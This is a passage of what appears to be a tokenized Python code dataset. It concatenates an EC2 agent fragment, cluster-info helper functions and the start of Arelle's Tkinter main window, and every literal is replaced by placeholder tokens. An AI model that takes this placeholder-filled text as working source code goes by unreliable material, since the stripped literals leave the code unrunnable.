authorize_security_group ( group , from_port = - <NUM_LIT:1> , to_port = - <NUM_LIT:1> , ip_protocol = '<STR_LIT>' , cidr_ip = '<STR_LIT>' ) <EOL> return True <EOL> except EC2ResponseError as exception : <EOL> self . handle_failure ( '<STR_LIT>' <EOL> '<STR_LIT>' . format ( exception . error_message ) ) <EOL> except Exception as exception : <EOL> self . handle_failure ( '<STR_LIT>' <EOL> '<STR_LIT>' . format ( exception . message ) ) <EOL> def run_instances ( self , count , parameters , security_configured ) : <EOL> """<STR_LIT>""" <EOL> if parameters [ self . PARAM_SPOT ] == "<STR_LIT:True>" : <EOL> parameters [ self . PARAM_SPOT ] = '<STR_LIT:False>' <EOL> utils . log ( "<STR_LIT>" ) <EOL> super . run_instances ( self , count , parameters , security_configured ) <EOL> def open_connection ( self , parameters ) : <EOL> """<STR_LIT>""" <EOL> credentials = parameters [ self . PARAM_CREDENTIALS ] <EOL> region_str = self . DEFAULT_REGION <EOL> access_key = str ( credentials [ '<STR_LIT>' ] ) <EOL> secret_key = str ( credentials [ '<STR_LIT>' ] ) <EOL> ec2_url = str ( credentials [ '<STR_LIT>' ] ) <EOL> result = urlparse ( ec2_url ) <EOL> if result . port is None or result . hostname is None or result . path is None : <EOL> self . handle_failure ( '<STR_LIT>' <EOL> '<STR_LIT>' . format ( result . scheme ) ) <EOL> return None <EOL> region = boto . ec2 . regioninfo . RegionInfo ( name = region_str , endpoint = result . hostname ) <EOL> return boto . connect_ec2 ( aws_access_key_id = access_key , <EOL> aws_secret_access_key = secret_key , <EOL> is_secure = ( result . scheme == '<STR_LIT>' ) , <EOL> region = region , <EOL> port = result . port , <EOL> path = result . path , debug = <NUM_LIT:2> ) </s>
<s> """<STR_LIT>""" <EOL> import json <EOL> import logging <EOL> import multiprocessing <EOL> import os <EOL> import sys <EOL> import yaml <EOL> import constants <EOL> import file_io <EOL> sys . path . append ( os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT>' ) ) <EOL> from google . appengine . api . appcontroller_client import AppControllerClient <EOL> def read_file_contents ( path ) : <EOL> """<STR_LIT>""" <EOL> with open ( path ) as file_handle : <EOL> return file_handle . read ( ) <EOL> def get_appcontroller_client ( ) : <EOL> """<STR_LIT>""" <EOL> head_node_ip_file = '<STR_LIT>' <EOL> head_node = read_file_contents ( head_node_ip_file ) . rstrip ( '<STR_LIT:\n>' ) <EOL> secret_file = '<STR_LIT>' <EOL> secret = read_file_contents ( secret_file ) <EOL> return AppControllerClient ( head_node , secret ) <EOL> def get_keyname ( ) : <EOL> """<STR_LIT>""" <EOL> return get_db_info ( ) [ '<STR_LIT>' ] <EOL> def get_all_ips ( ) : <EOL> """<STR_LIT>""" <EOL> nodes = file_io . read ( constants . ALL_IPS_LOC ) <EOL> nodes = nodes . split ( '<STR_LIT:\n>' ) <EOL> return filter ( None , nodes ) <EOL> def get_login_ip ( ) : <EOL> """<STR_LIT>""" <EOL> return file_io . read ( constants . LOGIN_IP_LOC ) . rstrip ( ) <EOL> def get_private_ip ( ) : <EOL> """<STR_LIT>""" <EOL> return file_io . read ( constants . PRIVATE_IP_LOC ) . rstrip ( ) <EOL> def get_public_ip ( ) : <EOL> """<STR_LIT>""" <EOL> return file_io . read ( constants . PUBLIC_IP_LOC ) . rstrip ( ) <EOL> def get_secret ( ) : <EOL> """<STR_LIT>""" <EOL> return file_io . read ( constants . SECRET_LOC ) . rstrip ( ) <EOL> def get_num_cpus ( ) : <EOL> """<STR_LIT>""" <EOL> return multiprocessing . cpu_count ( ) <EOL> def get_db_info ( ) : <EOL> """<STR_LIT>""" <EOL> info = file_io . read ( constants . DB_INFO_LOC ) <EOL> return yaml . load ( info ) <EOL> def get_taskqueue_nodes ( ) : <EOL> """<STR_LIT>""" <EOL> nodes = file_io . read ( constants . TASKQUEUE_NODE_FILE ) <EOL> nodes = nodes . 
split ( '<STR_LIT:\n>' ) <EOL> if nodes [ - <NUM_LIT:1> ] == '<STR_LIT>' : <EOL> nodes = nodes [ : - <NUM_LIT:1> ] <EOL> return nodes <EOL> def get_app_path ( app_id ) : <EOL> """<STR_LIT>""" <EOL> return constants . APPS_PATH + app_id + '<STR_LIT>' <EOL> def get_zk_locations_string ( ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> info = file_io . read ( constants . ZK_LOCATIONS_JSON_FILE ) <EOL> zk_json = json . loads ( info ) <EOL> return "<STR_LIT>" . join ( zk_json [ '<STR_LIT>' ] ) + "<STR_LIT>" <EOL> except IOError , io_error : <EOL> logging . exception ( io_error ) <EOL> return constants . ZK_DEFAULT_CONNECTION_STR <EOL> except ValueError , value_error : <EOL> logging . exception ( value_error ) <EOL> return constants . ZK_DEFAULT_CONNECTION_STR <EOL> except TypeError , type_error : <EOL> logging . exception ( type_error ) <EOL> return constants . ZK_DEFAULT_CONNECTION_STR <EOL> except KeyError , key_error : <EOL> logging . exception ( key_error ) <EOL> return constants . ZK_DEFAULT_CONNECTION_STR <EOL> def get_zk_node_ips ( ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> info = file_io . read ( constants . ZK_LOCATIONS_JSON_FILE ) <EOL> zk_json = json . loads ( info ) <EOL> return zk_json [ '<STR_LIT>' ] <EOL> except IOError , io_error : <EOL> logging . exception ( io_error ) <EOL> return [ ] <EOL> except ValueError , value_error : <EOL> logging . exception ( value_error ) <EOL> return [ ] <EOL> except TypeError , type_error : <EOL> logging . exception ( type_error ) <EOL> return [ ] <EOL> except KeyError , key_error : <EOL> logging . exception ( key_error ) <EOL> return [ ] <EOL> def get_db_master_ip ( ) : <EOL> """<STR_LIT>""" <EOL> return file_io . read ( constants . MASTERS_FILE_LOC ) . rstrip ( ) <EOL> def get_db_slave_ips ( ) : <EOL> """<STR_LIT>""" <EOL> nodes = file_io . read ( constants . SLAVES_FILE_LOC ) . rstrip ( ) <EOL> nodes = nodes . 
split ( '<STR_LIT:\n>' ) <EOL> if nodes [ - <NUM_LIT:1> ] == '<STR_LIT>' : <EOL> nodes = nodes [ : - <NUM_LIT:1> ] <EOL> return nodes <EOL> def get_db_ips ( ) : <EOL> """<STR_LIT>""" <EOL> return list ( set ( [ get_db_master_ip ( ) ] + get_db_slave_ips ( ) ) ) <EOL> def get_search_location ( ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return file_io . read ( constants . SEARCH_FILE_LOC ) . rstrip ( ) <EOL> except IOError : <EOL> logging . warning ( "<STR_LIT>" ) <EOL> return "<STR_LIT>" </s>
<s> '''<STR_LIT>''' <EOL> from arelle import PythonUtil <EOL> import os , sys , subprocess , pickle , time , locale , re <EOL> from tkinter import ( Tk , TclError , Toplevel , Menu , PhotoImage , StringVar , BooleanVar , N , S , E , W , EW , <EOL> HORIZONTAL , VERTICAL , END , font as tkFont ) <EOL> try : <EOL> from tkinter . ttk import Frame , Button , Label , Combobox , Separator , PanedWindow , Notebook <EOL> except ImportError : <EOL> from ttk import Frame , Button , Label , Combobox , Separator , PanedWindow , Notebook <EOL> import tkinter . tix <EOL> import tkinter . filedialog <EOL> import tkinter . messagebox , traceback <EOL> from arelle . Locale import format_string <EOL> from arelle . CntlrWinTooltip import ToolTip <EOL> from arelle import XbrlConst <EOL> from arelle . PluginManager import pluginClassMethods <EOL> from arelle . UrlUtil import isHttpUrl <EOL> import logging <EOL> import threading , queue <EOL> from arelle import Cntlr <EOL> from arelle import ( DialogURL , DialogLanguage , <EOL> DialogPluginManager , DialogPackageManager , <EOL> ModelDocument , <EOL> ModelManager , <EOL> PackageManager , <EOL> RenderingEvaluator , <EOL> TableStructure , <EOL> ViewWinDTS , <EOL> ViewWinProperties , ViewWinConcepts , ViewWinRelationshipSet , ViewWinFormulae , <EOL> ViewWinFactList , ViewFileFactList , ViewWinFactTable , ViewWinRenderedGrid , ViewWinXml , <EOL> ViewWinRoleTypes , ViewFileRoleTypes , ViewFileConcepts , <EOL> ViewWinTests , ViewWinTree , ViewWinVersReport , ViewWinRssFeed , <EOL> ViewFileTests , <EOL> ViewFileRenderedGrid , <EOL> ViewFileRelationshipSet , <EOL> Updater <EOL> ) <EOL> from arelle . ModelFormulaObject import FormulaOptions <EOL> from arelle . FileSource import openFileSource <EOL> restartMain = True <EOL> class CntlrWinMain ( Cntlr . Cntlr ) : <EOL> def __init__ ( self , parent ) : <EOL> super ( CntlrWinMain , self ) . __init__ ( hasGui = True ) <EOL> self . parent = parent <EOL> self . filename = None <EOL> self . 
dirty = False <EOL> overrideLang = self . config . get ( "<STR_LIT>" ) <EOL> self . labelLang = overrideLang if overrideLang else self . modelManager . defaultLang <EOL> self . data = { } <EOL> if self . isMac : <EOL> _defaultFont = tkFont . nametofont ( "<STR_LIT>" ) <EOL> _defaultFont . configure ( size = <NUM_LIT:11> ) <EOL> _textFont = tkFont . nametofont ( "<STR_LIT>" ) <EOL> _textFont . configure ( size = <NUM_LIT:11> ) <EOL> toolbarButtonPadding = <NUM_LIT:1> <EOL> else : <EOL> toolbarButtonPadding = <NUM_LIT:4> <EOL> tkinter . CallWrapper = TkinterCallWrapper <EOL> imgpath = self . imagesDir + os . sep <EOL> if self . isMSW : <EOL> icon = imgpath + "<STR_LIT>" <EOL> parent . iconbitmap ( icon , default = icon ) <EOL> else : <EOL> parent . iconbitmap ( "<STR_LIT:@>" + imgpath + "<STR_LIT>" ) <EOL> self . menubar = Menu ( self . parent ) <EOL> self . parent [ "<STR_LIT>" ] = self . menubar <EOL> self . fileMenu = Menu ( self . menubar , tearoff = <NUM_LIT:0> ) <EOL> self . fileMenuLength = <NUM_LIT:1> <EOL> for label , command , shortcut_text , shortcut in ( <EOL> ( _ ( "<STR_LIT>" ) , self . fileOpen , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( _ ( "<STR_LIT>" ) , self . webOpen , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( _ ( "<STR_LIT>" ) , self . importFileOpen , None , None ) , <EOL> ( _ ( "<STR_LIT>" ) , self . importWebOpen , None , None ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , None , None ) , <EOL> ( _ ( "<STR_LIT>" ) , self . fileSaveExistingFile , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( _ ( "<STR_LIT>" ) , self . fileSave , None , None ) , <EOL> ( _ ( "<STR_LIT>" ) , self . saveDTSpackage , None , None ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , None , None ) , <EOL> ( _ ( "<STR_LIT>" ) , self . fileClose , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( None , None , None , None ) , <EOL> ( _ ( "<STR_LIT>" ) , self . 
quit , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( None , None , None , None ) , <EOL> ( "<STR_LIT>" , None , None , None ) <EOL> ) : <EOL> if label is None : <EOL> self . fileMenu . add_separator ( ) <EOL> elif label == "<STR_LIT>" : <EOL> for pluginMenuExtender in pluginClassMethods ( command ) : <EOL> pluginMenuExtender ( self , self . fileMenu ) <EOL> self . fileMenuLength += <NUM_LIT:1> <EOL> else : <EOL> self . fileMenu . add_command ( label = label , underline = <NUM_LIT:0> , command = command , accelerator = shortcut_text ) <EOL> self . parent . bind ( shortcut , command ) <EOL> self . fileMenuLength += <NUM_LIT:1> <EOL> self . loadFileMenuHistory ( ) <EOL> self . menubar . add_cascade ( label = _ ( "<STR_LIT>" ) , menu = self . fileMenu , underline = <NUM_LIT:0> ) <EOL> toolsMenu = Menu ( self . menubar , tearoff = <NUM_LIT:0> ) <EOL> validateMenu = Menu ( self . menubar , tearoff = <NUM_LIT:0> ) <EOL> toolsMenu . add_cascade ( label = _ ( "<STR_LIT>" ) , menu = validateMenu , underline = <NUM_LIT:0> ) <EOL> validateMenu . add_command ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , command = self . validate ) <EOL> self . modelManager . validateDisclosureSystem = self . config . setdefault ( "<STR_LIT>" , False ) <EOL> self . validateDisclosureSystem = BooleanVar ( value = self . modelManager . validateDisclosureSystem ) <EOL> self . validateDisclosureSystem . trace ( "<STR_LIT:w>" , self . setValidateDisclosureSystem ) <EOL> validateMenu . add_checkbutton ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , variable = self . validateDisclosureSystem , onvalue = True , offvalue = False ) <EOL> validateMenu . add_command ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , command = self . selectDisclosureSystem ) <EOL> self . modelManager . validateCalcLB = self . config . setdefault ( "<STR_LIT>" , False ) <EOL> self . validateCalcLB = BooleanVar ( value = self . modelManager . validateCalcLB ) <EOL> self . validateCalcLB . 
trace ( "<STR_LIT:w>" , self . setValidateCalcLB ) <EOL> validateMenu . add_checkbutton ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , variable = self . validateCalcLB , onvalue = True , offvalue = False ) <EOL> self . modelManager . validateInferDecimals = self . config . setdefault ( "<STR_LIT>" , False ) <EOL> self . validateInferDecimals = BooleanVar ( value = self . modelManager . validateInferDecimals ) <EOL> self . validateInferDecimals . trace ( "<STR_LIT:w>" , self . setValidateInferDecimals ) <EOL> validateMenu . add_checkbutton ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , variable = self . validateInferDecimals , onvalue = True , offvalue = False ) <EOL> self . modelManager . validateUtr = self . config . setdefault ( "<STR_LIT>" , True ) <EOL> self . validateUtr = BooleanVar ( value = self . modelManager . validateUtr ) <EOL> self . validateUtr . trace ( "<STR_LIT:w>" , self . setValidateUtr ) <EOL> validateMenu . add_checkbutton ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , variable = self . validateUtr , onvalue = True , offvalue = False ) <EOL> for pluginMenuExtender in pluginClassMethods ( "<STR_LIT>" ) : <EOL> pluginMenuExtender ( self , validateMenu ) <EOL> formulaMenu = Menu ( self . menubar , tearoff = <NUM_LIT:0> ) <EOL> formulaMenu . add_command ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , command = self . formulaParametersDialog ) <EOL> toolsMenu . add_cascade ( label = _ ( "<STR_LIT>" ) , menu = formulaMenu , underline = <NUM_LIT:0> ) <EOL> self . modelManager . formulaOptions = FormulaOptions ( self . config . get ( "<STR_LIT>" ) ) <EOL> toolsMenu . add_command ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , command = self . compareDTSes ) <EOL> cacheMenu = Menu ( self . menubar , tearoff = <NUM_LIT:0> ) <EOL> rssWatchMenu = Menu ( self . menubar , tearoff = <NUM_LIT:0> ) <EOL> rssWatchMenu . add_command ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , command = self . 
rssWatchOptionsDialog ) <EOL> rssWatchMenu . add_command ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , command = lambda : self . rssWatchControl ( start = True ) ) <EOL> rssWatchMenu . add_command ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , command = lambda : self . rssWatchControl ( stop = True ) ) <EOL> toolsMenu . add_cascade ( label = _ ( "<STR_LIT>" ) , menu = rssWatchMenu , underline = <NUM_LIT:0> ) <EOL> self . modelManager . rssWatchOptions = self . config . setdefault ( "<STR_LIT>" , { } ) <EOL> toolsMenu . add_cascade ( label = _ ( "<STR_LIT>" ) , menu = cacheMenu , underline = <NUM_LIT:0> ) <EOL> self . webCache . workOffline = self . config . setdefault ( "<STR_LIT>" , False ) <EOL> self . workOffline = BooleanVar ( value = self . webCache . workOffline ) <EOL> self . workOffline . trace ( "<STR_LIT:w>" , self . setWorkOffline ) <EOL> cacheMenu . add_checkbutton ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , variable = self . workOffline , onvalue = True , offvalue = False ) <EOL> '''<STR_LIT>''' <EOL> cacheMenu . add_command ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , command = self . confirmClearWebCache ) <EOL> cacheMenu . add_command ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , command = self . manageWebCache ) <EOL> cacheMenu . add_command ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , command = self . setupProxy ) <EOL> logmsgMenu = Menu ( self . menubar , tearoff = <NUM_LIT:0> ) <EOL> toolsMenu . add_cascade ( label = _ ( "<STR_LIT>" ) , menu = logmsgMenu , underline = <NUM_LIT:0> ) <EOL> logmsgMenu . add_command ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , command = self . logClear ) <EOL> logmsgMenu . add_command ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , command = self . logSaveToFile ) <EOL> self . modelManager . collectProfileStats = self . config . setdefault ( "<STR_LIT>" , False ) <EOL> self . collectProfileStats = BooleanVar ( value = self . 
modelManager . collectProfileStats ) <EOL> self . collectProfileStats . trace ( "<STR_LIT:w>" , self . setCollectProfileStats ) <EOL> logmsgMenu . add_checkbutton ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , variable = self . collectProfileStats , onvalue = True , offvalue = False ) <EOL> logmsgMenu . add_command ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , command = self . showProfileStats ) <EOL> logmsgMenu . add_command ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , command = self . clearProfileStats ) <EOL> self . showDebugMessages = BooleanVar ( value = self . config . setdefault ( "<STR_LIT>" , False ) ) <EOL> self . showDebugMessages . trace ( "<STR_LIT:w>" , self . setShowDebugMessages ) <EOL> logmsgMenu . add_checkbutton ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , variable = self . showDebugMessages , onvalue = True , offvalue = False ) <EOL> toolsMenu . add_command ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , command = lambda : DialogLanguage . askLanguage ( self ) ) <EOL> for pluginMenuExtender in pluginClassMethods ( "<STR_LIT>" ) : <EOL> pluginMenuExtender ( self , toolsMenu ) <EOL> self . menubar . add_cascade ( label = _ ( "<STR_LIT>" ) , menu = toolsMenu , underline = <NUM_LIT:0> ) <EOL> if any ( pluginClassMethods ( "<STR_LIT>" ) ) : <EOL> viewMenu = Menu ( self . menubar , tearoff = <NUM_LIT:0> ) <EOL> for pluginMenuExtender in pluginClassMethods ( "<STR_LIT>" ) : <EOL> pluginMenuExtender ( self , viewMenu ) <EOL> self . menubar . add_cascade ( label = _ ( "<STR_LIT>" ) , menu = viewMenu , underline = <NUM_LIT:0> ) <EOL> helpMenu = Menu ( self . menubar , tearoff = <NUM_LIT:0> ) <EOL> for label , command , shortcut_text , shortcut in ( <EOL> ( _ ( "<STR_LIT>" ) , lambda : Updater . checkForUpdates ( self ) , None , None ) , <EOL> ( _ ( "<STR_LIT>" ) , lambda : DialogPluginManager . dialogPluginManager ( self ) , None , None ) , <EOL> ( _ ( "<STR_LIT>" ) , lambda : DialogPackageManager . 
dialogPackageManager ( self ) , None , None ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , None , None ) , <EOL> ( None , None , None , None ) , <EOL> ( _ ( "<STR_LIT>" ) , self . helpAbout , None , None ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , None , None ) , <EOL> ) : <EOL> if label is None : <EOL> helpMenu . add_separator ( ) <EOL> elif label == "<STR_LIT>" : <EOL> for pluginMenuExtender in pluginClassMethods ( command ) : <EOL> pluginMenuExtender ( self , helpMenu ) <EOL> else : <EOL> helpMenu . add_command ( label = label , underline = <NUM_LIT:0> , command = command , accelerator = shortcut_text ) <EOL> self . parent . bind ( shortcut , command ) <EOL> for pluginMenuExtender in pluginClassMethods ( "<STR_LIT>" ) : <EOL> pluginMenuExtender ( self , toolsMenu ) <EOL> self . menubar . add_cascade ( label = _ ( "<STR_LIT>" ) , menu = helpMenu , underline = <NUM_LIT:0> ) <EOL> windowFrame = Frame ( self . parent ) <EOL> self . statusbar = Label ( windowFrame , text = _ ( "<STR_LIT>" ) , anchor = W ) <EOL> self . statusbarTimerId = self . statusbar . after ( <NUM_LIT> , self . uiClearStatusTimerEvent ) <EOL> self . statusbar . grid ( row = <NUM_LIT:2> , column = <NUM_LIT:0> , columnspan = <NUM_LIT:2> , sticky = EW ) <EOL> self . toolbar_images = [ ] <EOL> toolbar = Frame ( windowFrame ) <EOL> menubarColumn = <NUM_LIT:0> <EOL> self . validateTooltipText = StringVar ( ) <EOL> for image , command , toolTip , statusMsg in ( <EOL> ( "<STR_LIT>" , self . fileOpen , _ ( "<STR_LIT>" ) , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , self . webOpen , _ ( "<STR_LIT>" ) , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , self . fileSaveExistingFile , _ ( "<STR_LIT>" ) , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , self . fileClose , _ ( "<STR_LIT>" ) , _ ( "<STR_LIT>" ) ) , <EOL> ( None , None , None , None ) , <EOL> ( "<STR_LIT>" , self . find , _ ( "<STR_LIT>" ) , _ ( "<STR_LIT>" ) ) , <EOL> ( None , None , None , None ) , <EOL> ( "<STR_LIT>" , self . validate , self . 
validateTooltipText , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , self . compareDTSes , _ ( "<STR_LIT>" ) , _ ( "<STR_LIT>" ) ) , <EOL> ( None , None , None , None ) , <EOL> ( "<STR_LIT>" , self . logClear , _ ( "<STR_LIT>" ) , _ ( "<STR_LIT>" ) ) , <EOL> ) : <EOL> if command is None : <EOL> tbControl = Separator ( toolbar , orient = VERTICAL ) <EOL> tbControl . grid ( row = <NUM_LIT:0> , column = menubarColumn , padx = <NUM_LIT:6> ) <EOL> elif isinstance ( image , Combobox ) : <EOL> tbControl = image <EOL> tbControl . grid ( row = <NUM_LIT:0> , column = menubarColumn ) <EOL> else : <EOL> image = os . path . join ( self . imagesDir , image ) <EOL> try : <EOL> image = PhotoImage ( file = image ) <EOL> self . toolbar_images . append ( image ) <EOL> tbControl = Button ( toolbar , image = image , command = command , style = "<STR_LIT>" , padding = toolbarButtonPadding ) <EOL> tbControl . grid ( row = <NUM_LIT:0> , column = menubarColumn ) <EOL> except TclError as err : <EOL> print ( err ) <EOL> if isinstance ( toolTip , StringVar ) : <EOL> ToolTip ( tbControl , textvariable = toolTip , wraplength = <NUM_LIT> ) <EOL> else : <EOL> ToolTip ( tbControl , text = toolTip ) <EOL> menubarColumn += <NUM_LIT:1> <EOL> for toolbarExtender in pluginClassMethods ( "<STR_LIT>" ) : <EOL> toolbarExtender ( self , toolbar ) <EOL> toolbar . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:0> , sticky = ( N , W ) ) <EOL> paneWinTopBtm = PanedWindow ( windowFrame , orient = VERTICAL ) <EOL> paneWinTopBtm . grid ( row = <NUM_LIT:1> , column = <NUM_LIT:0> , sticky = ( N , S , E , W ) ) <EOL> paneWinLeftRt = tkinter . PanedWindow ( paneWinTopBtm , orient = HORIZONTAL ) <EOL> paneWinLeftRt . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:0> , sticky = ( N , S , E , W ) ) <EOL> paneWinLeftRt . bind ( "<STR_LIT>" , self . onTabChanged ) <EOL> paneWinTopBtm . add ( paneWinLeftRt ) <EOL> self . tabWinTopLeft = Notebook ( paneWinLeftRt , width = <NUM_LIT> , height = <NUM_LIT> ) <EOL> self . 
tabWinTopLeft . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:0> , sticky = ( N , S , E , W ) ) <EOL> paneWinLeftRt . add ( self . tabWinTopLeft ) <EOL> self . tabWinTopRt = Notebook ( paneWinLeftRt ) <EOL> self . tabWinTopRt . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:0> , sticky = ( N , S , E , W ) ) <EOL> self . tabWinTopRt . bind ( "<STR_LIT>" , self . onTabChanged ) <EOL> paneWinLeftRt . add ( self . tabWinTopRt ) <EOL> self . tabWinBtm = Notebook ( paneWinTopBtm ) <EOL> self . tabWinBtm . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:0> , sticky = ( N , S , E , W ) ) <EOL> self . tabWinBtm . bind ( "<STR_LIT>" , self . onTabChanged ) <EOL> paneWinTopBtm . add ( self . tabWinBtm ) <EOL> from arelle import ViewWinList <EOL> self . logView = ViewWinList . ViewList ( None , self . tabWinBtm , _ ( "<STR_LIT>" ) , True ) <EOL> self . startLogging ( logHandler = WinMainLogHandler ( self ) ) <EOL> logViewMenu = self . logView . contextMenu ( contextMenuClick = self . contextMenuClick ) <EOL> logViewMenu . add_command ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , command = self . logClear ) <EOL> logViewMenu . add_command ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , command = self . logSaveToFile ) <EOL> if self . hasClipboard : <EOL> logViewMenu . add_command ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , command = lambda : self . logView . copyToClipboard ( cntlr = self ) ) <EOL> windowFrame . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:0> , sticky = ( N , S , E , W ) ) <EOL> windowFrame . columnconfigure ( <NUM_LIT:0> , weight = <NUM_LIT> ) <EOL> windowFrame . columnconfigure ( <NUM_LIT:1> , weight = <NUM_LIT:1> ) <EOL> windowFrame . rowconfigure ( <NUM_LIT:0> , weight = <NUM_LIT:1> ) <EOL> windowFrame . rowconfigure ( <NUM_LIT:1> , weight = <NUM_LIT> ) <EOL> windowFrame . rowconfigure ( <NUM_LIT:2> , weight = <NUM_LIT:1> ) <EOL> paneWinTopBtm . columnconfigure ( <NUM_LIT:0> , weight = <NUM_LIT:1> ) <EOL> paneWinTopBtm . 
rowconfigure ( <NUM_LIT:0> , weight = <NUM_LIT:1> ) <EOL> paneWinLeftRt . columnconfigure ( <NUM_LIT:0> , weight = <NUM_LIT:1> ) <EOL> paneWinLeftRt . rowconfigure ( <NUM_LIT:0> , weight = <NUM_LIT:1> ) <EOL> self . tabWinTopLeft . columnconfigure ( <NUM_LIT:0> , weight = <NUM_LIT:1> ) <EOL> self . tabWinTopLeft . rowconfigure ( <NUM_LIT:0> , weight = <NUM_LIT:1> ) <EOL> self . tabWinTopRt . columnconfigure ( <NUM_LIT:0> , weight = <NUM_LIT:1> ) <EOL> self . tabWinTopRt . rowconfigure ( <NUM_LIT:0> , weight = <NUM_LIT:1> ) <EOL> self . tabWinBtm . columnconfigure ( <NUM_LIT:0> , weight = <NUM_LIT:1> ) <EOL> self . tabWinBtm . rowconfigure ( <NUM_LIT:0> , weight = <NUM_LIT:1> ) <EOL> window = self . parent . winfo_toplevel ( ) <EOL> window . columnconfigure ( <NUM_LIT:0> , weight = <NUM_LIT:1> ) <EOL> window . rowconfigure ( <NUM_LIT:0> , weight = <NUM_LIT:1> ) <EOL> priorState = self . config . get ( '<STR_LIT>' ) <EOL> screenW = self . parent . winfo_screenwidth ( ) - <NUM_LIT:16> <EOL> screenH = self . parent . winfo_screenheight ( ) - <NUM_LIT:64> <EOL> if priorState == "<STR_LIT>" : <EOL> self . parent . state ( "<STR_LIT>" ) <EOL> w = screenW <EOL> h = screenH <EOL> else : <EOL> priorGeometry = re . match ( "<STR_LIT>" , self . config . get ( '<STR_LIT>' ) ) <EOL> if priorGeometry and priorGeometry . lastindex >= <NUM_LIT:4> : <EOL> try : <EOL> w = int ( priorGeometry . group ( <NUM_LIT:1> ) ) <EOL> h = int ( priorGeometry . group ( <NUM_LIT:2> ) ) <EOL> x = int ( priorGeometry . group ( <NUM_LIT:3> ) ) <EOL> y = int ( priorGeometry . 
group ( <NUM_LIT:4> ) ) <EOL> if x + w > screenW : <EOL> if w < screenW : <EOL> x = screenW - w <EOL> else : <EOL> x = <NUM_LIT:0> <EOL> w = screenW <EOL> elif x < <NUM_LIT:0> : <EOL> x = <NUM_LIT:0> <EOL> if w > screenW : <EOL> w = screenW <EOL> if y + h > screenH : <EOL> if y < screenH : <EOL> y = screenH - h <EOL> else : <EOL> y = <NUM_LIT:0> <EOL> h = screenH <EOL> elif y < <NUM_LIT:0> : <EOL> y = <NUM_LIT:0> <EOL> if h > screenH : <EOL> h = screenH <EOL> self . parent . geometry ( "<STR_LIT>" . format ( w , h , x , y ) ) <EOL> except : <EOL> pass <EOL> topLeftW , topLeftH = self . config . get ( '<STR_LIT>' , ( <NUM_LIT> , <NUM_LIT> ) ) <EOL> if <NUM_LIT:10> < topLeftW < w - <NUM_LIT> : <EOL> self . tabWinTopLeft . config ( width = topLeftW ) <EOL> if <NUM_LIT:10> < topLeftH < h - <NUM_LIT> : <EOL> self . tabWinTopLeft . config ( height = topLeftH ) <EOL> self . parent . title ( _ ( "<STR_LIT>" ) ) <EOL> self . logFile = None <EOL> self . uiThreadQueue = queue . Queue ( ) <EOL> self . uiThreadChecker ( self . statusbar ) <EOL> self . modelManager . loadCustomTransforms ( ) <EOL> if not self . modelManager . disclosureSystem . select ( self . config . setdefault ( "<STR_LIT>" , None ) ) : <EOL> self . validateDisclosureSystem . set ( False ) <EOL> self . modelManager . validateDisclosureSystem = False <EOL> self . setValidateTooltipText ( ) <EOL> def onTabChanged ( self , event , * args ) : <EOL> try : <EOL> widgetIndex = event . widget . index ( "<STR_LIT>" ) <EOL> tabId = event . widget . tabs ( ) [ widgetIndex ] <EOL> for widget in event . widget . winfo_children ( ) : <EOL> if str ( widget ) == tabId : <EOL> self . currentView = widget . view <EOL> break <EOL> except ( AttributeError , TypeError , TclError ) : <EOL> pass <EOL> def loadFileMenuHistory ( self ) : <EOL> self . fileMenu . delete ( self . fileMenuLength , self . fileMenuLength + <NUM_LIT:2> ) <EOL> fileHistory = self . config . setdefault ( "<STR_LIT>" , [ ] ) <EOL> self . 
